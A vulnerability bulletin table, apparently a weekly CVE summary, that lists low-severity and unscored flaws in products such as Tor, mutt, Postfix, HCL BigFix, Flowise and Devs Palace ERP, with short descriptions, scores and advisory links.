| HCL--BigFix Service Management (SM) | HCL BigFix Service Management (SM) is affected by a security misconfiguration vulnerability due to CSP header. This could allow attackers to inject malicious scripts increasing the risk of cross-site scripting (XSS) and potential exposure of sensitive information. | 2026-05-06 | 3.7 | CVE-2025-31983 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144 |
| HCL--BigFix Service Management (SM) | HCL BigFix Service Management (SM) is affected by a security misconfiguration due to a missing or insecure "X-Content-Type-Options" header. This could allow browsers to perform MIME-type sniffing, potentially causing malicious content to be interpreted and executed incorrectly. | 2026-05-06 | 3.7 | CVE-2025-31984 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144 |
| HCL--DFXAnalytics | HCL DFXAnalytics is affected by a Using Components with Known Vulnerabilities flaw where the application utilizes unpatched libraries or sub-components, which could allow an attacker to identify and exploit publicly known security vulnerabilities to gain unauthorized access or compromise the application. | 2026-05-06 | 3.7 | CVE-2025-59851 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130569 |
| HCL--DFXAnalytics | HCL DFXAnalytics is affected by an Insufficient Transport Layer Protection vulnerability where data is transmitted over the network without encryption, which could allow an attacker to compromise the confidentiality, integrity, and authentication of sensitive information. | 2026-05-06 | 3.7 | CVE-2025-59852 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130569 |
| HCL--DFXAnalytics | HCL DFXAnalytics is affected by an Improper Error Handling vulnerability where the application exposes detailed stack traces in responses, which could allow an attacker to gain insights into the application's internal structure, code logic, and environment configurations. | 2026-05-06 | 3.1 | CVE-2025-59853 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130569 |
| HCL--DFXAnalytics | HCL DFXAnalytics is affected by an Insecure Security Header Configuration vulnerability where the application utilizes the outdated X-XSS-Protection header, which could allow an attacker to exploit browser-specific rendering flaws or bypass security controls that should instead be managed by a robust Content Security Policy (CSP). | 2026-05-06 | 3.1 | CVE-2025-59854 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130569 |
| Dell--PowerScale OneFS | Dell PowerScale OneFS versions 9.5.0.0 through 9.5.1.6, 9.6.0.0 through 9.7.1.13, 9.8.0.0 through 9.10.1.5 and 9.11.0.0 through 9.12.0.1 contains an Insufficient Logging vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Information tampering. | 2026-05-08 | 3.3 | CVE-2026-32803 | https://www.dell.com/support/kbdoc/en-us/000461228/dsa-2026-172-security-update-for-dell-powerscale-onefs-insufficient-logging-vulnerability |
| kimai--kimai | Kimai is an open-source time tracking application. Prior to version 2.54.0, the Team API endpoints use #[IsGranted('edit_team')] instead of #[IsGranted('edit', 'team')], causing Symfony TeamVoter to abstain from voting. This removes entity-level ownership checks on team operations, allowing any user with the edit_team permission to modify any team, not just teams they are authorized to manage. This issue has been patched in version 2.54.0. | 2026-05-08 | 3.3 | CVE-2026-41498 | https://github.com/kimai/kimai/security/advisories/GHSA-jv9x-w4gm-hwcm https://github.com/kimai/kimai/releases/tag/2.54.0 |
| Admidio--admidio | Admidio is an open-source user management solution. Prior to version 5.0.9, several administrative operations in Admidio's preferences module (database backup, test email, htaccess generation) fire via GET requests with no CSRF token validation. Because SameSite=Lax cookies travel with top-level GET navigations, an attacker forces an authenticated admin to trigger these actions from a malicious page. This issue has been patched in version 5.0.9. | 2026-05-07 | 3.5 | CVE-2026-41663 | https://github.com/Admidio/admidio/security/advisories/GHSA-rw74-vc9h-534j https://github.com/Admidio/admidio/releases/tag/v5.0.9 |
| jgraph--drawio | draw.io is a configurable diagramming and whiteboarding application. Prior to version 29.7.9, the draw.io client accepts a ?gitlab= URL parameter that overrides the GitLab server URL used during OAuth sign-in. A crafted link causes the user's click on draw.io's "Authorize in GitLab" dialog to open a popup on the attacker-controlled host instead of gitlab.com. This can lead to credential fishing and session state token exfiltration. This issue has been patched in version 29.7.9. | 2026-05-08 | 3.4 | CVE-2026-42195 | https://github.com/jgraph/drawio/security/advisories/GHSA-8x7j-m8px-7p8x https://github.com/jgraph/drawio/issues/493 https://github.com/jgraph/drawio/releases/tag/v29.7.9 |
| mutt--mutt | mutt before 2.3.2 sometimes uses strfcpy instead of memcpy for the IMAP auth_cram MD5 digest. | 2026-05-04 | 3.7 | CVE-2026-43859 | https://github.com/muttmua/mutt/commit/834c5a2ed0479e51e8662a31caed129f136f4805 |
| mutt--mutt | mutt before 2.3.2 sometimes truncates the hash_passwd by one byte for IMAP auth_cram MD5 digest. | 2026-05-04 | 3.7 | CVE-2026-43860 | https://github.com/muttmua/mutt/commit/834c5a2ed0479e51e8662a31caed129f136f4805 |
| mutt--mutt | mutt before 2.3.2 does not check for '\0' in url_pct_decode. | 2026-05-04 | 3.7 | CVE-2026-43861 | https://github.com/muttmua/mutt/commit/12f54fe3b61f761c096fe95e95d5e3072af00ed2 |
| mutt--mutt | In mutt before 2.3.2, the imap_auth_gss security level is mishandled. | 2026-05-04 | 3.7 | CVE-2026-43862 | https://github.com/muttmua/mutt/commit/f547a849cdacb512800a5f477c27de217e1c8151 |
| mutt--mutt | mutt before 2.3.2 has an infinite loop in data_object_to_stream in crypt-gpgme.c. | 2026-05-04 | 3.7 | CVE-2026-43863 | https://github.com/muttmua/mutt/commit/fdc04a171777327218a1e78db504926c388b48c4 |
| Postfix--Postfix | Postfix before 3.8.16, 3.9 before 3.9.10, and 3.10 before 3.10.9 sometimes allows a buffer over-read and process crash via an enhanced status code that lacks text after the third number. | 2026-05-04 | 3.7 | CVE-2026-43964 | https://www.mail-archive.com/postfix-announce@postfix.org/msg00110.html |
| Paramiko--Paramiko | In Paramiko through 4.0.0 before a448945, rsakey.py allows the SHA-1 algorithm. | 2026-05-05 | 3.4 | CVE-2026-44405 | https://github.com/paramiko/paramiko/commit/a4489456b6f65281e172380cc4826cee5e851dbb https://ostif.org/wp-content/uploads/2026/05/25-11-2415-REP_paramiko-security-audit_v1.1.pdf |
| torproject--Tor | Tor before 0.4.9.7 has an out-of-bounds read when an END, a TRUNCATE, or a TRUNCATED cell lacks a reason in its payload, aka TROVE-2026-011. | 2026-05-07 | 3.7 | CVE-2026-44597 | https://forum.torproject.org/c/news/tor-release-announcement/28 https://www.openwall.com/lists/oss-security/2026/05/06/8 https://gitlab.torproject.org/tpo/core/tor/-/work_items/41254 https://gitlab.torproject.org/tpo/core/tor/-/commit/8f98054b1982d00a14639864d03e9afd90b87481 |
| torproject--Tor | Tor before 0.4.9.7 can attempt or accept BEGIN_DIR via conflux legs, aka TROVE-2026-008. | 2026-05-07 | 3.7 | CVE-2026-44599 | https://forum.torproject.org/c/news/tor-release-announcement/28 https://www.openwall.com/lists/oss-security/2026/05/06/8 https://gitlab.torproject.org/tpo/core/tor/-/work_items/41243 https://gitlab.torproject.org/tpo/core/tor/-/commit/50f90ba849088247734786922855c22661c6fa03 |
| torproject--Tor | Tor before 0.4.9.7 mishandles accounting of the conflux out-of-order queue during the clearing of a queue, aka TROVE-2026-010. | 2026-05-07 | 3.7 | CVE-2026-44600 | https://forum.torproject.org/c/news/tor-release-announcement/28 https://www.openwall.com/lists/oss-security/2026/05/06/8 https://gitlab.torproject.org/tpo/core/tor/-/work_items/41251 https://gitlab.torproject.org/tpo/core/tor/-/commit/a198185ed863677d60eec120126730628dac35bb |
| torproject--Tor | Tor before 0.4.9.7, when circuit queue memory pressure exists, can experience a client crash because of a double close of a circuit, aka TROVE-2026-009. | 2026-05-07 | 3.7 | CVE-2026-44601 | https://forum.torproject.org/c/news/tor-release-announcement/28 https://www.openwall.com/lists/oss-security/2026/05/06/8 https://gitlab.torproject.org/tpo/core/tor/-/work_items/41237 https://gitlab.torproject.org/tpo/core/tor/-/commit/d4e3f6a440b58c2be661decf20c09548704907dc |
| torproject--Tor | Tor before 0.4.9.7 has a NULL pointer dereference when a CERT cell is received out of order, aka TROVE-2026-006. | 2026-05-07 | 3.7 | CVE-2026-44602 | https://forum.torproject.org/c/news/tor-release-announcement/28 https://www.openwall.com/lists/oss-security/2026/05/06/8 https://gitlab.torproject.org/tpo/core/tor/-/work_items/41240 https://gitlab.torproject.org/tpo/core/tor/-/commit/df7d5174ef41814d806c8ede776e230cd30ac12b |
| torproject--Tor | Tor before 0.4.9.7 has an out-of-bounds read by one byte via a malformed BEGIN cell, aka TROVE-2026-007. | 2026-05-07 | 3.7 | CVE-2026-44603 | https://forum.torproject.org/c/news/tor-release-announcement/28 https://www.openwall.com/lists/oss-security/2026/05/06/8 https://gitlab.torproject.org/tpo/core/tor/-/work_items/41245 https://gitlab.torproject.org/tpo/core/tor/-/commit/1703df3d439c83c2184e259fad1cfa19240f9c89 |
| OpenStack--Ironic | In OpenStack Ironic through 35.x, instance_info['ks_template'] is rendered without sandboxing. | 2026-05-08 | 3 | CVE-2026-44916 | https://bugs.launchpad.net/ironic/+bug/2148307 |
| Syslifters--sysreptor | SysReptor is a fully customizable pentest reporting platform. Prior to version 2026.29, users with "User Admin" permissions can change the email addresses of users with "Superuser" permissions. If the SysReptor installation has the "Forgot Password" functionality enabled (non-default), they can reset the Superusers' passwords and authenticate, if the Superuser has no MFA enabled. User managers can then access the Django backend (/admin) or manipulate the settings of the SysReptor installation. Note that user managers have the ability to access all pentest projects by assigning themselves "Project Admin" permissions. This is intentional and by design. This issue has been patched in version 2026.29. | 2026-05-08 | 3.8 | CVE-2026-44987 | https://github.com/Syslifters/sysreptor/security/advisories/GHSA-6x8f-v3cf-cvr3 https://github.com/Syslifters/sysreptor/releases/tag/2026.29 |
| justdan96--tsMuxer | A weakness has been identified in justdan96 tsMuxer up to 2.7.0. This vulnerability affects the function HevcVpsUnit::setFPS of the file /AFLplusplus/tsMuxer_prev/tsMuxer/hevc.cpp. This manipulation of the argument track_id causes denial of service. The attack requires local access. The exploit has been made available to the public and could be used for attacks. This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-04 | 3.3 | CVE-2026-7739 | VDB-360914 | justdan96 tsMuxer hevc.cpp setFPS denial of service VDB-360914 | CTI Indicators (IOB, IOC, IOA) Submit #807647 | tsMuxer git-7f8667d crash https://github.com/justdan96/tsMuxer/issues/895 https://github.com/user-attachments/files/16812270/poc1.zip https://github.com/justdan96/tsMuxer/ |
| justdan96--tsMuxer | A security vulnerability has been detected in justdan96 tsMuxer up to 2.7.0. This issue affects the function VvcVpsUnit::setFPS of the file tsMuxer/vvc.cpp. Such manipulation of the argument track_id leads to denial of service. An attack has to be approached locally. The exploit has been disclosed publicly and may be used. This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-04 | 3.3 | CVE-2026-7740 | VDB-360915 | justdan96 tsMuxer vvc.cpp setFPS denial of service VDB-360915 | CTI Indicators (IOB, IOC, IOA) Submit #807651 | tsMuxer git-7f8667d crash https://github.com/justdan96/tsMuxer/issues/899 https://github.com/user-attachments/files/16812319/poc5.zip https://github.com/justdan96/tsMuxer/ |
| FlowiseAI--Flowise | A security flaw has been discovered in FlowiseAI Flowise up to 3.0.12. Affected is the function Login of the file packages/server/src/enterprise/services/account.service.ts of the component API Response Handler. The manipulation results in information disclosure. The attack can be launched remotely. A high complexity level is associated with this attack. The exploitability is told to be difficult. You should upgrade the affected component. | 2026-05-06 | 3.7 | CVE-2026-8026 | VDB-361273 | FlowiseAI Flowise API Response account.service.ts login information disclosure VDB-361273 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #777656 | FlowiseAI Flowise <= 3.0.12 Exposure of Sensitive Information (CWE-200) https://gist.github.com/YLChen-007/50a553f09aa1c7c04ce18cec13986a91 |
| FlowiseAI--Flowise | A vulnerability was detected in FlowiseAI Flowise up to 3.0.12. This affects the function verify of the file packages/server/src/enterprise/services/account.service.ts of the component Endpoint. Performing a manipulation results in information disclosure. Remote exploitation of the attack is possible. The attack is considered to have high complexity. It is indicated that the exploitability is difficult. The exploit is now public and may be used. Upgrading the affected component is recommended. | 2026-05-06 | 3.7 | CVE-2026-8028 | VDB-361276 | FlowiseAI Flowise Endpoint account.service.ts verify information disclosure VDB-361276 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #777659 | FlowiseAI Flowise <= 3.0.12 Exposure of Sensitive Information (CWE-200) https://gist.github.com/YLChen-007/1d52497b0221835f99367be61612746b |
| OSGeo--gdal | A vulnerability was determined in OSGeo gdal up to 3.13.0dev-4. This vulnerability affects the function memmove of the file frmts/hdf4/hdf-eos/SWapi.c of the component HDF-EOS Grid File Handler. This manipulation causes out-of-bounds read. The attack is restricted to local execution. The exploit has been publicly disclosed and may be utilized. Upgrading to version 3.13.0RC1 is able to resolve this issue. Patch name: a791f70f8eaec540974ec989ca6fb00266b7646c. Upgrading the affected component is advised. | 2026-05-07 | 3.3 | CVE-2026-8084 | VDB-361838 | OSGeo gdal HDF-EOS Grid File SWapi.c memmove out-of-bounds VDB-361838 | CTI Indicators (IOB, IOC, IOA) Submit #808034 | OSGeo GDAL 3.13.0dev Out-of-Bounds Read https://github.com/biniamf/pocs/tree/main/gdal_swfinfo_dimlist_oob-rw https://github.com/OSGeo/gdal/issues/14378 https://github.com/biniamf/pocs/blob/main/gdal_swfinfo_dimlist_oob-rw https://github.com/OSGeo/gdal/commit/a791f70f8eaec540974ec989ca6fb00266b7646c https://github.com/OSGeo/gdal/releases/tag/v3.13.0RC1 https://github.com/OSGeo/gdal/ |
| OSGeo--gdal | A weakness has been identified in OSGeo gdal up to 3.13.0dev-4. The affected element is the function GDfieldinfo of the file frmts/hdf4/hdf-eos/GDapi.c. Executing a manipulation can lead to out-of-bounds read. The attack needs to be launched locally. The exploit has been made available to the public and could be used for attacks. Upgrading to version 3.13.0RC1 is sufficient to fix this issue. This patch is called a791f70f8eaec540974ec989ca6fb00266b7646c. The affected component should be upgraded. | 2026-05-07 | 3.3 | CVE-2026-8088 | VDB-361841 | OSGeo gdal GDapi.c GDfieldinfo out-of-bounds VDB-361841 | CTI Indicators (IOB, IOC, IOA) Submit #808040 | OSGeo GDAL 3.13.0dev Out-of-Bounds Read https://github.com/OSGeo/gdal/issues/14379 https://github.com/biniamf/pocs/tree/main/gdal-gdapi-gdfinfo-dimlist-oob-read https://github.com/OSGeo/gdal/commit/a791f70f8eaec540974ec989ca6fb00266b7646c https://github.com/OSGeo/gdal/releases/tag/v3.13.0RC1 https://github.com/OSGeo/gdal/ |
| n/a--Open5GS | A vulnerability was detected in Open5GS up to 2.7.7. Impacted is the function ogs_sbi_stream_find_by_id in the library /lib/sbi/nghttp2-server.c of the component NSSF. Performing a manipulation results in denial of service. Attacking locally is a requirement. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-08 | 3.3 | CVE-2026-8119 | VDB-361906 | Open5GS NSSF nghttp2-server.c ogs_sbi_stream_find_by_id denial of service VDB-361906 | CTI Indicators (IOB, IOC, IOA) Submit #808420 | Open5gs NSSF v2.7.7 Denial of Service https://github.com/open5gs/open5gs/issues/4431 https://github.com/open5gs/open5gs/ |
| n/a--GPAC | A security vulnerability has been detected in GPAC up to 26.02.0. This affects the function sidx_box_read of the file src/isomedia/box_code_base.c. The manipulation leads to allocation of resources. The attack must be carried out locally. The exploit has been disclosed publicly and may be used. The identifier of the patch is 442e2299530138d8f874fd885c565ba98a6318ba. It is suggested to install a patch to address this issue. | 2026-05-08 | 3.3 | CVE-2026-8124 | VDB-361914 | GPAC box_code_base.c sidx_box_read allocation of resources VDB-361914 | CTI Indicators (IOB, IOC, IOA) Submit #808611 | gpac latest Denial of Service (DoS) https://github.com/gpac/gpac/issues/3519 https://github.com/gpac/gpac/commit/442e2299530138d8f874fd885c565ba98a6318ba https://github.com/gpac/gpac/ |
| n/a--JeecgBoot | A flaw has been found in JeecgBoot 3.9.1. The impacted element is an unknown function of the file jeecg-module-system/jeecg-system-biz/src/main/java/org/jeecg/modules/system/controller/LoginController.java of the component mLogin Endpoint. This manipulation causes authorization bypass. The attack is possible to be carried out remotely. The attack is considered to have high complexity. The exploitability is regarded as difficult. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-09 | 3.7 | CVE-2026-8196 | VDB-362348 | JeecgBoot mLogin Endpoint LoginController.java authorization VDB-362348 | CTI Indicators (IOB, IOC, IOA) Submit #803529 | jeecgboot JeecgBoot 3.9.1 Authorization Bypass https://github.com/xpp3901/CVE_APPLY/tree/main/V-009_mLogin_Captcha_Bypass |
| Dotouch--XproUPF | A vulnerability was found in Dotouch XproUPF 2.0.0-release-088aa7c4. This impacts the function vlib_worker_loop in the library /usr/xpro/upf/tools/libs/libvlib.so of the component UPF Process. The manipulation results in denial of service. The vendor was contacted early about this disclosure. | 2026-05-10 | 3.5 | CVE-2026-8232 | VDB-362449 | Dotouch XproUPF UPF Process libvlib.so vlib_worker_loop denial of service VDB-362449 | CTI Indicators (IOB, IOC, IOA) Submit #808794 | Dotouch XproUPF v2.0.0-release-088aa7c4 Denial of Service |
| Industrial Application Software IAS--Canias ERP | A vulnerability was found in Industrial Application Software IAS Canias ERP 8.03. The impacted element is the function doAction of the component Login RMI Interface. Performing a manipulation results in observable response discrepancy. The attack is possible to be carried out remotely. A high degree of complexity is needed for the attack. The exploitability is regarded as difficult. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-10 | 3.7 | CVE-2026-8242 | VDB-362458 | Industrial Application Software IAS Canias ERP Login RMI doAction response discrepancy VDB-362458 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808295 | Industrial Application Software - IAS Canias ERP 8.03-- Observable Response Discrepancy (CWE-204) https://hawktrace.com/blog/caniaserp https://gist.github.com/0xb1lal/85422a63c10a001c75a22365457de624 |
| HCL Software--BigFix Service Management (SM) | HHCL BigFix Service Management (SM) is affected by a Cross‑Site Request Forgery (CSRF) vulnerability. This could lead to unauthorized changes or exposure of sensitive data. | 2026-05-06 | 2.6 | CVE-2025-31957 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144 |
| HCL--BigFix Service Management (SM) | HCL BigFix Service Management (SM) is affected by an Information Disclosure - Server Banner issue was identified. Exposed server banners may reveal software versions and system details, potentially aiding attackers in targeting known vulnerabilities. | 2026-05-06 | 2.6 | CVE-2025-31975 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144 |
| HCL--BigFix RunBookAI | HCL BigFix RunBookAI is affected by a Continued availability of Less-Secure "Input Text" Vulnerability . A component contains a security weakness in its input handling implementation, increasing the risk of misconfiguration and operational errors. | 2026-05-06 | 2.7 | CVE-2025-62345 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130444 |
| Admidio--admidio | Admidio is an open-source user management solution. Prior to version 5.0.9, the member assignment DataTables endpoint (members_assignment_data.php) includes hidden profile fields (BIRTHDAY, STREET, CITY, POSTCODE, COUNTRY) in its SQL search condition regardless of field visibility settings. While the JSON output correctly suppresses hidden columns via isVisible() checks, the server-side search operates at the SQL level before any visibility filtering. This allows a role leader with assign-only permissions to infer hidden PII values by observing which users appear in search results for specific values. This issue has been patched in version 5.0.9. | 2026-05-07 | 2.7 | CVE-2026-41659 | https://github.com/Admidio/admidio/security/advisories/GHSA-68pr-7prh-mpv4 https://github.com/Admidio/admidio/releases/tag/v5.0.9 |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.10 contains a time-of-check-time-of-use vulnerability in the validateScriptFileForShellBleed function that allows local attackers to bypass workspace boundary checks. An attacker with workspace write access can race-condition swap the target file between validation and preflight read, causing the validator to inspect a different file identity than the one that passed the initial boundary check. | 2026-05-05 | 2.5 | CVE-2026-43529 | GitHub Security Advisory (GHSA-gj9q-8w99-mp8j) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.10 - Time-of-Check-Time-of-Use (TOCTOU) Race Condition in exec Script Preflight Validator |
| mutt--mutt | mutt before 2.3.2 has a show_sig_summary NULL pointer dereference. | 2026-05-04 | 2.5 | CVE-2026-43864 | https://github.com/muttmua/mutt/commit/ebfa2969042d89303d15334193fcc32866c8a8df |
| uriparser--uriparser | In uriparser before 1.0.2, there is pointer difference truncation to int in various places. | 2026-05-08 | 2.9 | CVE-2026-44927 | https://github.com/uriparser/uriparser/pull/304 |
| uriparser--uriparser | In uriparser before 1.0.2, the function family EqualsUri can misclassify two unequal URIs as equal. | 2026-05-08 | 2.9 | CVE-2026-44928 | https://github.com/uriparser/uriparser/pull/305 |
| GrapheneOS--GrapheneOS | GrapheneOS before 2026050400 allows attackers to discover the real IP address of a VPN user as a consequence of a registerQuicConnectionClosePayload optimization, because an application can let system_server transmit UDP traffic on its behalf. This occurs when the "Block connections without VPN" and "Always-on VPN" settings are enabled. | 2026-05-09 | 2.2 | CVE-2026-45182 | https://lowlevel.fun/posts/tiny-udp-cannon-android-vpn-bypass/ https://grapheneos.org/releases#2026050400 https://cyberinsider.com/grapheneos-fixes-android-vpn-leak-google-refused-to-patch/ |
| libexpat project--libexpat | In libexpat before 2.8.1, the computational complexity of attribute name collision checks allows a denial of service via moderately sized crafted XML input. | 2026-05-10 | 2.9 | CVE-2026-45186 | https://github.com/libexpat/libexpat/pull/1216 |
| chatchat-space--Langchain-Chatchat | A flaw has been found in chatchat-space Langchain-Chatchat up to 0.3.1.3. This issue affects the function PIL.Image.tobytes of the file libs/chatchat-server/chatchat/webui_pages/dialogue/dialogue.py of the component Vision Chat Paste Image Handler. This manipulation of the argument paste_image.image_data causes use of weak hash. The attacker needs to be present on the local network. The attack is considered to have high complexity. The exploitability is assessed as difficult. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-05 | 2.6 | CVE-2026-7845 | VDB-361124 | chatchat-space Langchain-Chatchat Vision Chat Paste Image dialogue.py PIL.Image.tobytes weak hash VDB-361124 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807794 | chatchat-space Langchain-Chatchat 0.3.1.3 Weak Hash / CWE-328 https://github.com/chatchat-space/Langchain-Chatchat/issues/5462 https://github.com/3em0/cve_repo/blob/main/Langchain-Chatchat/Vuln-1-tobytes-Hash-Collision.md https://github.com/chatchat-space/Langchain-Chatchat/ |
| chatchat-space--Langchain-Chatchat | A vulnerability has been found in chatchat-space Langchain-Chatchat up to 0.3.1.3. Impacted is the function files of the file libs/chatchat-server/chatchat/server/api_server/openai_routes.py of the component OpenAI-Compatible File Upload API. Such manipulation of the argument file.filename leads to time-of-check time-of-use. Access to the local network is required for this attack to succeed. The attack requires a high level of complexity. The exploitability is considered difficult. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-05 | 2.6 | CVE-2026-7846 | VDB-361125 | chatchat-space Langchain-Chatchat OpenAI-Compatible File Upload API openai_routes.py files toctou VDB-361125 | CTI Indicators (IOB, IOC, IOA) Submit #807795 | chatchat-space Langchain-Chatchat 0.3.1.3 TOCTOU Race Condition / CWE-367 https://github.com/chatchat-space/Langchain-Chatchat/issues/5463 https://github.com/3em0/cve_repo/blob/main/Langchain-Chatchat/Vuln-2-Silent-File-Overwrite.md https://github.com/chatchat-space/Langchain-Chatchat/ |
| chatchat-space--Langchain-Chatchat | A vulnerability was found in chatchat-space Langchain-Chatchat up to 0.3.1.3. The affected element is the function _get_file_id of the file libs/chatchat-server/chatchat/server/api_server/openai_routes.py of the component Uploaded File Handler. Performing a manipulation results in insufficiently random values. Access to the local network is required for this attack. The attack's complexity is rated as high. The exploitability is described as difficult. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-05 | 2.6 | CVE-2026-7847 | VDB-361126 | chatchat-space Langchain-Chatchat Uploaded File openai_routes.py _get_file_id random values VDB-361126 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807796 | chatchat-space Langchain-Chatchat 0.3.1.3 Use of Insufficiently Random Values / CWE-330 https://github.com/chatchat-space/Langchain-Chatchat/issues/5464 https://github.com/3em0/cve_repo/blob/main/Langchain-Chatchat/Vuln-3-Predictable-File-ID.md https://github.com/chatchat-space/Langchain-Chatchat/ |
| SourceCodester--Pharmacy Sales and Inventory System | A flaw has been found in SourceCodester Pharmacy Sales and Inventory System 1.0. This affects an unknown part of the file /index.php?page=users. Executing a manipulation of the argument Name can lead to cross site scripting. The attack may be launched remotely. The exploit has been published and may be used. | 2026-05-08 | 2.4 | CVE-2026-8136 | VDB-361925 | SourceCodester Pharmacy Sales and Inventory System index.php users cross site scripting VDB-361925 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808839 | SourceCodester Pharmacy Sales and Inventory System V1.0 cross site scripting https://github.com/timeflies123/cve/issues/1 https://www.sourcecodester.com/ |
| Devs Palace--ERP Online | A weakness has been identified in Devs Palace ERP Online up to 4.0.0. The affected element is an unknown function of the file /inventory/purchase_return_save. Executing a manipulation can lead to cross site scripting. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-10 | 2.4 | CVE-2026-8218 | VDB-362435 | Devs Palace ERP Online purchase_return_save cross site scripting VDB-362435 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808252 | Devs Palace ERP Online 4.0.0 Code Injection Submit #808259 | Devs Palace ERP Online 4.0.0 Code Injection in "inventory/purchase_return_save" (Duplicate) https://olografix.org/acme/_poc/ERP_Online-POC1.gif |
| Devs Palace--ERP Online | A security vulnerability has been detected in Devs Palace ERP Online up to 4.0.0. The impacted element is an unknown function of the file /inventory/supplier-save. The manipulation leads to cross site scripting. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-10 | 2.4 | CVE-2026-8219 | VDB-362436 | Devs Palace ERP Online supplier-save cross site scripting VDB-362436 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808257 | Devs Palace ERP Online 4.0.0 Code Injection in "/inventory/supplier-save" https://olografix.org/acme/_poc/ERP_Online-POC1.gif |
| Devs Palace--ERP Online | A vulnerability was detected in Devs Palace ERP Online up to 4.0.0. This affects an unknown function of the file /inventory/customer-save. The manipulation results in cross site scripting. The attack can be executed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-10 | 2.4 | CVE-2026-8220 | VDB-362437 | Devs Palace ERP Online customer-save cross site scripting VDB-362437 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808261 | Devs Palace ERP Online 4.0.0 Code Injection in "inventory/customer-save" https://olografix.org/acme/_poc/ERP_Online-POC1.gif |
| Devs Palace--ERP Online | A flaw has been found in Devs Palace ERP Online up to 4.0.0. This impacts an unknown function of the file /inventory/item-save. This manipulation causes cross site scripting. The attack is possible to be carried out remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-10 | 2.4 | CVE-2026-8221 | VDB-362438 | Devs Palace ERP Online item-save cross site scripting VDB-362438 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808263 | Devs Palace ERP Online 4.0.0 Code Injection in "inventory/item-save" https://olografix.org/acme/_poc/ERP_Online-POC1.gif |
| Devs Palace--ERP Online | A vulnerability was identified in Devs Palace ERP Online up to 4.0.0. Affected by this vulnerability is an unknown functionality of the file /inventory/purchase_save. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-10 | 2.4 | CVE-2026-8253 | VDB-362550 | Devs Palace ERP Online purchase_save cross site scripting VDB-362550 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808277 | Devs Palace ERP Online 4.0.0 Code Injection https://olografix.org/acme/_poc/ERP_Online-POC1.gif |
| Devs Palace--ERP Online | A security flaw has been discovered in Devs Palace ERP Online up to 4.0.0. Affected by this issue is some unknown functionality of the file /inventory/sales_save. The manipulation results in cross site scripting. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-10 | 2.4 | CVE-2026-8254 | VDB-362551 | Devs Palace ERP Online sales_save cross site scripting VDB-362551 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808279 | Devs Palace ERP Online 4.0.0 Code Injection https://olografix.org/acme/_poc/ERP_Online-POC1.gif |
Severity Not Yet Assigned
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| CHORNY--Apache::Session | Apache::Session versions through 1.94 for Perl re-creates deleted sessions. The session stores Apache::Session::Store::File and Apache::Session::Store::DB_File will create a session that does not exist. This can lead to sessions being revived, potentially with data that was to be deleted. | 2026-05-08 | not yet calculated | CVE-2013-10075 | https://rt.cpan.org/Public/Bug/Display.html?id=83525 |
| www[.]thruk[.]org--Thruk Monitoring | In Thruk Monitoring through 2.46.3, the login field of the login form is vulnerable to reflected XSS. This vulnerability can be exploited by unauthenticated remote attackers to target users of the monitoring interface. | 2026-05-08 | not yet calculated | CVE-2022-23961 | https://herolab.usd.de/security-advisories/ https://herolab.usd.de/security-advisories/usd-2021-0034/ |
| www[.]avast[.]com—Avast/AVG Windows Anti Rootkit driver | The socket connection handler in aswArPot.sys in the Avast and AVG Windows Anti Rootkit driver before 22.1 allows local attackers to execute arbitrary code in kernel mode or cause a denial of service (memory corruption and OS crash) due to a double fetch vulnerability at aswArPot+0xc4a3. | 2026-05-08 | not yet calculated | CVE-2022-26522 | https://www.avast.com/bug-bounty https://www.sentinelone.com/labs/vulnerabilities-in-avast-and-avg-put-millions-at-risk/ |
